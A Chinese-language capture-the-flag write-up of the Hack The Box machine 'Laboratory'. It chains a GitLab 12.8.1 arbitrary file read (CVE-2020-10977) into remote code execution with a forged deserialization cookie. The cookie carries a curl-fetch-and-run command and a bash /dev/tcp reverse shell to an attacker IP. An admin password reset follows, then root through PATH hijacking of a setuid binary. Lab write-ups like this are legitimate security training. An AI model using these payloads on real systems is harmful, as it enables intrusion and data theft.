HTB-靶机-Laboratory

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.216

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

信息枚举收集
https://github.com/codingo/Reconnoitre 跟autorecon类似
autorecon 10.10.10.216 -o ./Laboratory-autorecon

sudo nmap -sT -p- --min-rate 10000 -oA scans/alltcp 10.10.10.216
或者

sudo masscan -p1-65535,U:1-65535 10.10.10.216 --rate=1000 -p1-65535,U:1-65535 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '
' ',' | sed 's/,$//')
sudo nmap -Pn -sV -sC -p$ports 10.10.10.216

得到的扫描结果

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after:  2024-03-03T10:39:28
| tls-alpn:
|_  http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

根据上面扫描的结果得知本次测试的目标靶机是需要通过域名访问，将其域名加入本地hosts文件中

追加hosts文件
sudo -- sh -c "echo '10.10.10.216 laboratory.htb' >> /etc/hosts"
sudo -- sh -c "echo '10.10.10.216 git.laboratory.htb' >> /etc/hosts"

访问这些域名

注册用户cntf然后访问https://git.laboratory.htb 点击了每个页面，在帮助菜单里面发现版本为12.8.1的gitlab 在谷歌上搜索了一把，发现存在任意文件读取漏洞

可参考:

https://hackerone.com/reports/827052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10977

漏洞大概利用操作就是创建两个Project 然后新建一个issue 写入要读取的文件，例如下面读取passwd文件内容

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)

然后将这个issue移动到另一个新建的Project就会发现文件已经被读取了，下载对应的文件即可，对应的exploit自动利用代码如下
https://github.com/thewhiteh4t/cve-2020-10977

漏洞利用得到的结果

python3 cve_2020_10977.py https://git.laboratory.htb cntf cntfcntf


[>] Absolute Path to File : /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml

---
production:
  db_key_base: 627773a77f567a5853a5c6652018f3f6e41d04aa53ed1e0df33c66b04ef0c38b88f402e0e73ba7676e93f1e54e425f74d59528fb35b170a1b9d5ce620bc11838
  secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
  otp_key_base: db3432d6fa4c43e68bf7024f3c92fea4eeea1f6be1e6ebd6bb6e40e930f0933068810311dc9f0ec78196faa69e0aac01171d62f4e225d61e0b84263903fd06af

过程展示

此处可以通过本地搭建gitlab环境替换secret_key_base来达到命令执行的目的，具体相关的操作

本地kali环境使用docker搭建跟目标靶机一样的gitlab环境，搭建之前先安装docker环境，可参考：https://zhuanlan.zhihu.com/p/82361096

sudo docker pull gitlab/gitlab-ee:12.8.1-ee.0
sudo docker run -it gitlab/gitlab-ee:12.8.1-ee.0 sh
/opt/gitlab/embedded/bin/runsvdir-start &
gitlab-rails console

nano /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml

将secret_key_base替换为目标靶机的secret_key_base
3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3

替换完成就可以拿到cookie，写入反弹shell命令代码触发反弹shell

执行下面命令进入console
gitlab-rails console

开始执行下面命令内容：

request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `curl {Your_IP}/Shell.sh -o /tmp/Shell.sh && chmod 777 /tmp/Shell.sh && bash /tmp/Shell.sh` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]

或者

request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `bash -c 'bash -i>& /dev/tcp/10.10.14.16/8833 0>&1'` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]

上面在测试的过程中发现在执行倒数第三步和第四步就成功反弹shell，确认反弹的shell是本地kali搭建的gitlab，而不是目标靶机的，所以不用管，直接ctrl+c中断执行最后两步拿到cookie，然后触发反弹shell代码

拿到cookie

BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kidCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBiYXNoIC1jICdiYXNoIC1pPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTYvODgzMyAwPiYxJ2AgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OglAdmFySSIMQHJlc3VsdAY7ClQ6EEBkZXByZWNhdG9ySXU6H0FjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uAAY7ClQ=--ded553d0f50b56445da7778756a4f2822d1835d6

触发反弹shell代码
curl -vvv 'https://git.laboratory.htb/users/sign_in' -k -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kidCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBiYXNoIC1jICdiYXNoIC1pPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTYvODgzMyAwPiYxJ2AgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OglAdmFySSIMQHJlc3VsdAY7ClQ6EEBkZXByZWNhdG9ySXU6H0FjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uAAY7ClQ=--ded553d0f50b56445da7778756a4f2822d1835d6"

成功反弹shell

上述成功之后，生成tty-shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=linux

更改密码
user = User.find(1)
user.password = '123456789'
user.password_confirmation = '123456789'
user.save!
exit

irb(main):001:0> user = User.find(1)
user = User.find(1)
=> #<User id:1 @dexter>
irb(main):002:0> user.password = '123456789'
user.password = '123456789'
=> "123456789"
irb(main):003:0> user.password_confirmation = '123456789'
user.password_confirmation = '123456789'
=> "123456789"
irb(main):004:0> user.save!
user.save!
Enqueued ActionMailer::DeliveryJob (Job ID: fb1c0851-a7de-4072-b8d6-b27a65c36458) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #<GlobalID:0x00007fea1b3254d0 @uri=#<URI::GID gid://gitlab/User/1>>
=> true
irb(main):005:0> exit
exit

登录目标靶机的web应用gitlab

 登录成功之后获得私钥，复制到本地kali给其权限为600然后ssh登录

拿到目标靶机权限开始信息搜集
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh

根据搜集的信息发现docker-security权限是带setuid 
-rwsr-xr-x  1 root dexter 16720 Aug 28  2020 docker-security

通过nc的方式将发现的二进制文件下载到kali

使用nc的方式将docker-security传到本地kali ，进行分析

kali：nc -lvnp 9933 > docker-security
靶机：nc 10.10.14.16 9933 < /usr/local/bin/docker-security

使用ltrace跟踪分析文件

kali@kali:~/Downloads/htb/laboratory$ ltrace ./docker-security
setuid(0)                                                                       = -1
setgid(0)                                                                       = -1
system("chmod 700 /usr/bin/docker"chmod: changing permissions of '/usr/bin/docker': Operation not permitted
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                          = 256
system("chmod 660 /var/run/docker.sock"chmod: changing permissions of '/var/run/docker.sock': Operation not permitted
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                          = 256
+++ exited (status 0) +++

发现此文件会调用chmod命令，那么我们可以通过路径劫持来提权，可参考：https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

开始提权

将下面代码保存为chmod.c

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>

int main(){
    setuid(getuid());
    system("/bin/bash");
    return 0;
}


gcc -o chmod chmod.c
scp -i laboratory_id_rsa chmod dexter@10.10.10.216:/tmp/

提权
export PATH=/tmp/:$PATH
/usr/local/bin/docker-security